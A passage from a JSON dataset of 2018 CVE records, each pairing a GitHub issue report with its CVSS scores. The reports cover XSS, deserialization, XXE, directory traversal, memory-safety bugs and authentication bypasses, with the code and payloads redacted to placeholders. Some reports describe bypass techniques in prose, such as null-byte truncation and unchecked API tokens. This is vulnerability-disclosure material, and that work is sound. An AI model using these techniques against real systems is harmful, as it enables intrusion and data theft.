        "Repo_new": "risingstack/protect",
        "Issue_Created_At": "2018-03-26T23:43:53Z",
        "description": "Vulnerable to XSS attacs. tl;dr Don't use regex's for sanitization of HTML but if you are, then at least strip out all tags with something like: APITAG But with even this, I'd imagine a carefully constructed XSS vector could get around it I'd advise: Escaping the characters using HTML entities e.g. ERRORTAG Using a nodes text APITAG isn't an option for server side code) e.g. ERRORTAG APITAG As discussed in many posts e.g. URLTAG URLTAG Regular expressions are not a valid approach when dealing with a more complicated language(especially when browsers support _dirty_ HTML) For example, here are NUMBERTAG alid XSS attack vectors that are all reported as false Attack Vectors ERRORTAG These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute. The results can be seen here: URLTAG I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet. If you insist on using regex, here's a good list + just remove any tag FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000162",
        "Issue_Url_old": "https://github.com/Roave/SecurityAdvisories/issues/44",
        "Issue_Url_new": "https://github.com/roave/securityadvisories/issues/44",
        "Repo_new": "roave/securityadvisories",
        "Issue_Created_At": "2018-02-26T17:52:30Z",
        "description": "Parsedown status is questionable?. Parsedown is listed here as having a security advisory, but I'm not NUMBERTAG sure it is warranted. It is a Markdown parsing library that takes the Markdown input it is given and turns it into HTML. Period. That is all it does. It is not output sanitizer and the author has stated that that is not a goal of the library. It already is possible to combine Parsedown with a sanitizer in order to sanitize output, for example: CODETAG IMO, these two things are separate concerns and forcing Parsedown to implement a full HTML sanitization feature or integrate with other libraries to do so when it can easily be done flexibly and easily in user land doesn't make a ton of sense. Thoughts?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000164",
        "Issue_Url_old": "https://github.com/benoitc/gunicorn/issues/1227",
        "Issue_Url_new": "https://github.com/benoitc/gunicorn/issues/1227",
        "Repo_new": "benoitc/gunicorn",
        "Issue_Created_At": "2016-03-17T13:40:41Z",
        "description": "Potential HTTP Response Splitting Vulnerability. This FILETAG was recently reported to and fixed in both waitress (WSGI server) URLTAG and APITAG URLTAG (and waitress has an outstanding issues URLTAG to discuss further possible vulnerabilities). I also made changes to gevent URLTAG for these issues. gunicorn seems to be partly (but not entirely) vulnerable to these issues as well, across at least the sync and gevent workers. Here are three apps, each producing different kinds of bad output. The badvalue case (invalid values in the header values) is probably the most likely injection vulnerability, with the next being the badname case (invalid value in the header names) and the least likely being the badstatus case (invalid value in the status line): CODETAG Here's what happens hitting badvalue . We get a bunch of duplicate headers that might confuse clients: ERRORTAG Here's what happens hitting badname . The worst I was able to do was produce malformed HTTP; on other servers I was able to cause clients to hang, but I haven't reproduced that with gunicorn (yet): ERRORTAG Finally, here's badstatus . Here, we completely override the rest of the response: APITAG Should gunicorn check for and raise exceptions for these type of malformed values in APITAG ?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000211",
        "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
        "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
        "Repo_new": "doorkeeper-gem/doorkeeper",
        "Issue_Created_At": "2016-10-05T13:00:29Z",
        "description": "Revoking token does not work for public clients. Hello, I'm using grant implicit to allow authorizing an application from mobile applications: APITAG After a successful oauth flow, the generated token is saved in the APITAG table jointly with the application referenced by the original APITAG request: CODETAG The APITAG is empty, as expected since using implicit . When I try to revoke this token using the POST /oauth/revoke API endpoint URLTAG (the one at the bottom, which does not require APITAG or APITAG to be passed), it does not get revoked. Diving into the source code, I see in the APITAG : ERRORTAG However, as per above the token _does_ specify the APITAG , despite having used the implicit grant type. Hence, when I try to revoke this token I land in the controller's authorized? method URLTAG : ERRORTAG Where APITAG is nil , hence authorized? returns false and the token does not get revoked. Is this expected behavior?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000216",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/241",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/241",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2018-02-07T07:51:36Z",
        "description": "Memory issues when printing APITAG I was taking a look at the cJSON codebase on behalf of a customer, and I noticed a couple of things that I wanted to check when printing APITAG values: If item >valuestring is NULL, the APITAG implementation may deallocate the write buffer and then return URLTAG . However, at least some callers of APITAG (for example APITAG will also deallocate this buffer on failure. This looks like a potential double free. If item >valuestring is not NULL, APITAG ensures the buffer is long enough to receive it and then memcpys the string length into the buffer URLTAG . This means the buffer is not NULL terminated. As it happens, if realloc is not available and APITAG was the caller of APITAG then it will null terminate the buffer \" just to be sure URLTAG \". But in any other case I think this string will not be null terminated, unless the malloced memory happened to be zero. I haven't had time to be verify this for certain, or write tests, but I thought I would report it while I had it in front of me.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000217",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/248",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/248",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2018-03-01T18:15:13Z",
        "description": "String deallocated before use. Maybe I'm doing things in a dumb way, but given the method I'm using, there's a problem with the function APITAG What I want to do is to parse a number of separate .json files and merge their contents into a single cJSON object. The files may partially duplicate each other. Objects and array items that are already in the result that is being constructed should be skipped during the processing of a .json file, i.e. no duplicate objects or array elements are permitted in the result output. So, at the top level each file contains one object (always with the same name, \"stuff\" in the simplified examples below), which in turn contains other objects, which contain arrays of objects. A simple example will illustrate what I want to achieve. .json file NUMBERTAG CODETAG .json file NUMBERTAG CODETAG I want the result of the merge operation to be a cJSON object that represents the following .json: CODETAG First, I use APITAG to start my result object. Then I process each .json file in turn, using APITAG to create a cJSON object that represents the file. Then this cJSON object is examined, and if any \"stuff\" is found, it is moved to the result object, except such objects/array elements as are already present there. Here is a code snippet that shows how I handle the merge operation for an object at the level directly under \"stuff\" that is not yet present at all in the result: CODETAG APITAG is a cJSON object from the current .json file, representing for example \"BAZ\" from the .json files above. I want to move that object from the cJSON object representing the .json file APITAG to the cJSON result object under construction APITAG The problem is that the internal function APITAG in cJSON assumes that its _string_ argument is valid throughout the function. But when I use APITAG >string_, that assumption becomes false, because that string is deallocated before a copy is made and inserted in the item before it's added to the target object. The result (at best) is that the item string will contain garbage. Perhaps the order of actions in APITAG could be rearranged, so that a copy of the _string_ argument is made before any deallocations? Of course, I could allocate memory and make a copy of the string in my own code, but that seems a bit silly. Maybe my method is naive, and a there is a better way of doing what I want that does not run into this kind of problem? If so, please let me know. I'm relatively new to cJSON.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000218",
        "Issue_Url_old": "https://github.com/openemr/openemr/issues/1781",
        "Issue_Url_new": "https://github.com/openemr/openemr/issues/1781",
        "Repo_new": "openemr/openemr",
        "Issue_Created_At": "2018-07-25T15:32:47Z",
        "description": "APITAG NUMBERTAG Cross Site Scripting in PATHTAG I found an application security issue in PATHTAG of APITAG NUMBERTAG and likely earlier versions. The vulnerability exists due to a lack of sanitation of user supplied input. The vulnerability allows attackers to execute javascript on remotely authenticated users via the 'file' and 'scan' parameters. Proof of Concept URL 'file' parameter: URLTAG Proof of Concept URL 'scan' parameter: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-1000222",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/447",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/447",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2018-07-14T17:12:59Z",
        "description": "APITAG possible double free bug . Possible double free bug same as CVETAG exists for ` function. CODETAG MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000224",
        "Issue_Url_old": "https://github.com/godotengine/godot/issues/20558",
        "Issue_Url_new": "https://github.com/godotengine/godot/issues/20558",
        "Repo_new": "godotengine/godot",
        "Issue_Created_At": "2018-07-29T01:55:55Z",
        "description": "Godot serialization security issues. Godot version: Any version of Godot since I could trace NUMBERTAG when it was open sourced) OS/device including version: Any Issue description: Few weeks ago, I noticed by chance that passing a specific array of bytes to APITAG PATHTAG class gdscript bytes2var crashed the engine. (in NUMBERTAG APITAG ). After further investigations I realised that the (de)serialization code hadn't seen love in a while, so I went for a full audit and found out there were actually a few more issues. The main issues where: Crash due to unbound allocation : Array types sometimes didn't have the right size check (due to incorrenct signed/unsigned comparison), causing the engine to try to allocate huge ammount of memory and being terminated by the OS. Read buffer overflow : Some types had incorrect size checks potentially causing buffer overflow during reading. Leak of memory content : Some strings padding where not correctly zeroized, potentially causing freed but not cleared internal memory disclosure over network (although be reassured by the fact that crypto libs like APITAG and APITAG does clear their memory when freeing things like private key and so on). I decided to privately contact few other developers ( MENTIONTAG MENTIONTAG MENTIONTAG APITAG and we agreed to embargo this issue while we worked on a fix. If you are reading this, patches are are already available (so this issue is actually closed), and updated binaries are available for download at the official Godot website URLTAG . Steps to reproduce: Run a script that executes NUMBERTAG APITAG Minimal reproduction project: Please see this testing project URLTAG I made to perform automatic tests. Afterwords First, I would like to thank all the devs involved, who helped me a lot during the development of the fix, and stayed online on weekends to do the releases. In my humble opinion, this incident, along with the history of this engine, clearly shows how source code availability and great communities like this one, can improve software quality with concrete benefits to everyone. From a security prospective, responsible disclosure is, in my opinion, the best road to security. In this sense, in the coming month we will be working on setting up guidelines and procedures in case anyone discovers a new security issue. In the meantime, I invite everyone with a passion in security, to try and break our engine, the network code, the serialization process. If you find anything, let us know here on Github or on IRC at godotengine devel , we won't sue you, we will actually thank you :heart:",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000225",
        "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1917",
        "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1917",
        "Repo_new": "cobbler/cobbler",
        "Issue_Created_At": "2018-08-02T14:57:32Z",
        "description": "Persistent XSS vulnerability in cobbler web. cobbler web renders HTML and executes APITAG payloads that are provided by users. Combined with authentication problems in the Cobbler XMLRPC API URLTAG , this allows unauthenticated users to inject malicious payloads into the web UI. A harmless Proof of Concept script: ERRORTAG Then when you visit the APITAG endpoint: FILETAG These payloads can be used to hijack the sessions of administrator and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information. cobbler web should sanitize all user provided inputs, and treat them as untrusted. This included never rendering user provided HTML, nor executing user provided APITAG See this post URLTAG for more discussion.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000226",
        "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1916",
        "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1916",
        "Repo_new": "cobbler/cobbler",
        "Issue_Created_At": "2018-08-02T14:55:55Z",
        "description": "Many XMLRPC API endpoints are not correctly validating security tokens. Looking at Cobbler's XMLRPC API, there are many places where the user supplied security token is not being correctly validated, effectively resulting in authentication being bypassed. Using some quick and dirty FILETAG , I discovered that there are no fewer than NUMBERTAG other endpoints that require an security token but don't actually use it! This means that unauthenticated users are able to perform all sorts of actions that they should not be able to. Example For example, the APITAG endpoint allows users to upload files to the server. As this is a dangerous action, there is a flag in APITAG that must be explicitly enabled before this functionality becomes available: From APITAG URLTAG : yaml NOTE: This does allow an xmlrpc call to send logs to this directory, without authentication, so enable only if you are ok with this limitation. anamon_enabled NUMBERTAG However, authenticated users can also change this setting in a running server using the APITAG endpoint in the XMLRPC API. APITAG But the actual implementation of the endpoint never validates the value of the token parameter, so any value works: CODETAG So it doesn't matter whether the server operator is \"ok with this limitation\", since unauthenticated users can change the value at any time. Conclusion There are many other potentially harmful endpoints in the API, and many more creative ways to exploit them. The Cobbler XMLRPC API needs to be carefully examined with security in mind to make sure that all of the API endpoints are validating their security tokens correctly. In the meantime, consider using a firewall to restrict/disable access to the APITAG endpoint. See this post URLTAG for more discussion.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000520",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/1561",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/1561",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2018-04-06T09:11:15Z",
        "description": "TLS ECDH RSA Ciphersuites Allow ECDSA Signed Certificates. Description Type: Bug Bug mbed TLS build: Version NUMBERTAG I assume it's also present in the newest build, as well as the previous ones) When the negotiated ciphersuite is of the type TLS ECDH RSA (ECDH key exchange + RSA signed certificate), ECDSA signed certificates are accepted, which means that the ciphersuite technically becomes TLS ECDH ECDSA. FILETAG states that in an ECDH_RSA key exchange, the certificate MUST be signed with RSA. Proof Of Concept Due to lack of time, I don't have time to submit a \"pretty\" POF, but here goes a sample client and server program. The client and the server accept a single argument: the id of the ciphersuite to use. You can use APITAG ( APITAG ), for example. Here are the sources: FILETAG FILETAG Simply compile both (if you place them in the APITAG directory and add the executables in APITAG it should work fine NUMBERTAG Compile NUMBERTAG Run APITAG NUMBERTAG Run APITAG NUMBERTAG Confirm that the connection is successful. Note that the server is using the certificate (it's printed out to the console): CODETAG which is signed with APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000523",
        "Issue_Url_old": "https://github.com/bram85/topydo/issues/240",
        "Issue_Url_new": "https://github.com/topydo/topydo/issues/240",
        "Repo_new": "topydo/topydo",
        "Issue_Created_At": "2018-05-13T03:44:39Z",
        "description": "Unexpected behaviour of topydo when tasks contain backslashes. topydo passes TODO texts as the repl argument of APITAG unchanged at PATHTAG If an issue contains a backslash, it is thus interpreted as an escape: an issue containing APITAG will output only foo . This can also lead to crashing topydo : APITAG will trigger a crash This, finally, also means that the TODO task can output whatever bytes it wants to the terminal without any check from topydo, thus potentially opening way to exploiting a flaw in the terminal's escape code handling from an untrusted FILETAG files (eg. automatically generated from untrusted sources, like code). (the attack path here looks rather narrow to me, though): APITAG outputs APITAG APITAG makes bar blink APITAG erases the previous TODO on the list (in topydo ls output) and replaces it by \u201cyou didn't see this\u201d etc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000525",
        "Issue_Url_old": "https://github.com/flack/openpsa/issues/191",
        "Issue_Url_new": "https://github.com/flack/openpsa/issues/191",
        "Repo_new": "flack/openpsa",
        "Issue_Created_At": "2018-05-29T13:28:00Z",
        "description": "PHP Object Deserialization. Issue An attacker can perform PHP object serialization attacks, which can possibly lead to remote code execution. Vulnerable Section URLTAG The code above displays that base NUMBERTAG encoded GET arguments are unserialized without being sanitised, which causes PHP object serialization attacks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000526",
        "Issue_Url_old": "https://github.com/flack/openpsa/issues/192",
        "Issue_Url_new": "https://github.com/flack/openpsa/issues/192",
        "Repo_new": "flack/openpsa",
        "Issue_Created_At": "2018-05-29T13:47:14Z",
        "description": "XML APITAG Attack. The Issue A specially crafted XML file can be used to create a denial of service scenario within the openpsa admin portal. Vulnerable Code URLTAG The above code displays that an XML file is being parsed. URLTAG The code above displays that the XML file is user controlled. This can allow an attacker to create a denial of service scenario for all versions of PHP prior to NUMBERTAG Minimum PHP requirements for openpsa project: URLTAG CVE for vulnerable PHP function: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000527",
        "Issue_Url_old": "https://github.com/Froxlor/Froxlor/issues/555",
        "Issue_Url_new": "https://github.com/froxlor/froxlor/issues/555",
        "Repo_new": "froxlor/froxlor",
        "Issue_Created_At": "2018-05-29T12:56:06Z",
        "description": "PHP Object Serialisation Bug. Summary An attacker with administrative privileges can perform PHP object serialisation attacks, which can possibly lead to remote code execution. System information Froxlor version NUMBERTAG Web server: apache2 DNS server: Bind POP/IMAP server: Courier SMTP server: postfix FTP server: proftpd APITAG Ubuntu Vulnerable Section URLTAG An administrator user can create a new domain and use the code above to deserialise a PHP object, running it's magic methods to execute PHP commands on the server. This may lead to remote code execution",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-1000528",
        "Issue_Url_old": "https://github.com/gosa-project/gosa-core/issues/14",
        "Issue_Url_new": "https://github.com/gosa-project/gosa-core/issues/14",
        "Repo_new": "gosa-project/gosa-core",
        "Issue_Created_At": "2018-05-23T12:03:11Z",
        "description": "Server Side Reflected XSS via POST to FILETAG . APITAG here as requested by Gonicus) The FILETAG endpoint fails to sanitize the uid POST parameter, leading to a Server Side Reflected XSS vulnerability as this parameter is later assigned to a Smarty variable of the same name and then rendered in the context of an HTML attribute in APITAG . As a result, arbitrary APITAG can be executed in the GOSA origin. This vulnerability is very similar to the one reported as CVETAG URLTAG , but uses a different endpoint. Suggested fix (untested): Use APITAG to escape the value of uid before assigning it to the Smarty variable here URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000529",
        "Issue_Url_old": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
        "Issue_Url_new": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
        "Repo_new": "grails-fields-plugin/grails-fields",
        "Issue_Created_At": "2018-05-24T12:04:00Z",
        "description": "XSS vulnerability when rendering f:display for beans . From MENTIONTAG We've received a XSS vulnerability report that it's caused by the Fields plugin. It's pretty easy to reproduce the issue (the user also provided a sample project), just a domain class with a String property with the value APITAG . Then using the default scaffolding the alert is displayed in both list and show pages.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000531",
        "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/3",
        "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/3",
        "Repo_new": "fusionauth/fusionauth-jwt",
        "Issue_Created_At": "2018-05-02T13:11:59Z",
        "description": "JWT signature validation can be bypassed in versions NUMBERTAG Summary The prime jwt implementation allows that any not signed JWT be decoded and, therefore, validated by APITAG class, even when a Verifier object is provided. This issue affects versions NUMBERTAG For security reasons, I'm contacting the developers by email with the necessary technical details. Description When the APITAG APITAG is called, the JWT signature will be ignored due to a lack of validation in APITAG A new condition should be added in this class to prevent that any APITAG without the signature part be decoded if exists at least NUMBERTAG erifier_ object.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000532",
        "Issue_Url_old": "https://github.com/johnath/beep/issues/11",
        "Issue_Url_new": "https://github.com/johnath/beep/issues/11",
        "Repo_new": "johnath/beep",
        "Issue_Created_At": "2018-04-03T11:34:26Z",
        "description": "CVETAG . Just a short heads up: CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-1000534",
        "Issue_Url_old": "https://github.com/laurent22/joplin/issues/500",
        "Issue_Url_new": "https://github.com/laurent22/joplin/issues/500",
        "Repo_new": "laurent22/joplin",
        "Issue_Created_At": "2018-05-08T11:54:40Z",
        "description": "Vulnerability report please contact. I would like to report a vulnerability. Could you please contact me on EMAILTAG as I did not manage to find any e mail from your repo to contact you. Best, Silvia",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000535",
        "Issue_Url_old": "https://github.com/lmsgit/lms/issues/1271",
        "Issue_Url_new": "https://github.com/chilek/lms/issues/1271",
        "Repo_new": "chilek/lms",
        "Issue_Created_At": "2018-05-29T14:29:46Z",
        "description": "Arbitrary File Read. The Issue An attacker can arbitrarily read files (which the user running the web application has permission to read) using unsanitised user input passed to the fopen PHP function Where the Issue Occured An attacker can control the file path for reading a file using the variable assignment below: URLTAG The above variable is passed to the line below, where the fopen function is being used to read the file: URLTAG As displayed above, APITAG is appended to the file name, however this can be bypassed (in some versions of PHP) using a null byte terminator NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000536",
        "Issue_Url_old": "https://github.com/luin/medis/issues/109",
        "Issue_Url_new": "https://github.com/luin/medis/issues/109",
        "Repo_new": "luin/medis",
        "Issue_Created_At": "2017-12-01T09:42:45Z",
        "description": "XSS to code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000540",
        "Issue_Url_old": "https://github.com/oswetto/LoboEvolution/issues/38",
        "Issue_Url_new": "https://github.com/loboevolution/loboevolution/issues/38",
        "Repo_new": "loboevolution/loboevolution",
        "Issue_Created_At": "2018-04-23T09:28:34Z",
        "description": "XXE Security Vulnerability within XML File Parsing Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below create an XML parser for parsing an XML file opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker can simply give a APITAG user an XML file (or maybe the user downloads the file off an untrusted website). The user then opens the file in the browser and triggers the XML parser, cause the vulnerability to be triggered. APITAG File APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000542",
        "Issue_Url_old": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
        "Issue_Url_new": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
        "Repo_new": "raydac/netbeans-mmd-plugin",
        "Issue_Created_At": "2018-05-29T14:10:54Z",
        "description": "XXE in file import. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The parser parses mind map files (which is XML) without proper protections within the parsing function. URLTAG The parsing module is called from the function below: URLTAG A specially crafted mind map file can exploit this XXE issue.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000543",
        "Issue_Url_old": "https://github.com/rockiger/akiee/issues/42",
        "Issue_Url_new": "https://github.com/rockiger/akiee/issues/42",
        "Repo_new": "rockiger/akiee",
        "Issue_Created_At": "2018-05-17T23:09:11Z",
        "description": "FILETAG FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by tricking his victim into opening a crafted FILETAG that looks like this ERRORTAG In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000544",
        "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/369",
        "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/369",
        "Repo_new": "rubyzip/rubyzip",
        "Issue_Created_At": "2018-06-14T18:41:06Z",
        "description": "Several directory traversal vulnerabilities. Overview This issue is similar to already closed URLTAG but I found two ways to bypass that fix. You can find files for tests in URLTAG Proof of concept: rubyzip.rb CODETAG NUMBERTAG Files with absolute path APITAG strips absolute path ERRORTAG rubyzip extracts files with absolute path CODETAG NUMBERTAG Archive with symbolic link APITAG extracts only symbolic link ERRORTAG rubyzip extracts symbolic link and puts file into APITAG folder CODETAG Vulnerable version and test environment ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000546",
        "Issue_Url_old": "https://github.com/triplea-game/triplea/issues/3442",
        "Issue_Url_new": "https://github.com/triplea-game/triplea/issues/3442",
        "Repo_new": "triplea-game/triplea",
        "Issue_Created_At": "2018-05-29T14:05:02Z",
        "description": "XXE in Game Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured URLTAG The above code parses a game file. A sample game file can be found at: FILETAG To exploit this issue, import the following XML code: APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000559",
        "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/4011",
        "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/4011",
        "Repo_new": "qutebrowser/qutebrowser",
        "Issue_Created_At": "2018-06-21T16:07:19Z",
